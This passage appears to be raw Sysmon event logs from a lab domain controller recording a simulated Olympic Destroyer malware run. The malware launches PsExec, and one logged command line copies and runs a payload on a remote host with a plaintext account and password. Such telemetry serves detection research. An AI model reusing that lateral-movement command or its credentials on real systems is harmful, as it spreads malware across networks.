10341000x8000000000000000292382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.167{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{00000000-0000-0000-0000-000000000000}6848C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.120{C8EA50B7-1301-6216-0206-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.120{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.120{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.120{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.120{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.117{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1301-6216-0206-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.116{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1301-6216-0206-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:06.098{C8EA50B7-1301-6216-0206-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 534500x8000000000000000292373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.067{C8EA50B7-1301-6216-0106-000000003802}6744C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.051{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1302-6216-0506-000000003802}6472C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.051{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1302-6216-0506-000000003802}6472C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.051{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1301-6216-0106-000000003802}6744C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.051{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1301-6216-0106-000000003802}6744C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.051{C8EA50B7-1302-6216-0506-000000003802}64726984C:\Windows\system32\conhost.exe{C8EA50B7-1301-6216-0206-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.036{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}6688C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000292366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:06.036{C8EA50B7-1301-6216-0106-000000003802}6744C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.036{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{00000000-0000-0000-0000-000000000000}6688C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.044{C8EA50B7-1302-6216-0606-000000003802}6688C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.22 -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.036{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{00000000-0000-0000-0000-000000000000}6688C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.036{C8EA50B7-1301-6216-FF05-000000003802}4252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.020{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}6472C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.020{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1301-6216-FF05-000000003802}4252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.020{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1301-6216-FF05-000000003802}4252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.020{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{00000000-0000-0000-0000-000000000000}6472C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.020{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.020{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.020{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:06.020{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:06.019{C8EA50B7-1301-6216-FF05-000000003802}4252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.998{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-0406-000000003802}5228C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:05.998{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1301-6216-0406-000000003802}5228C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 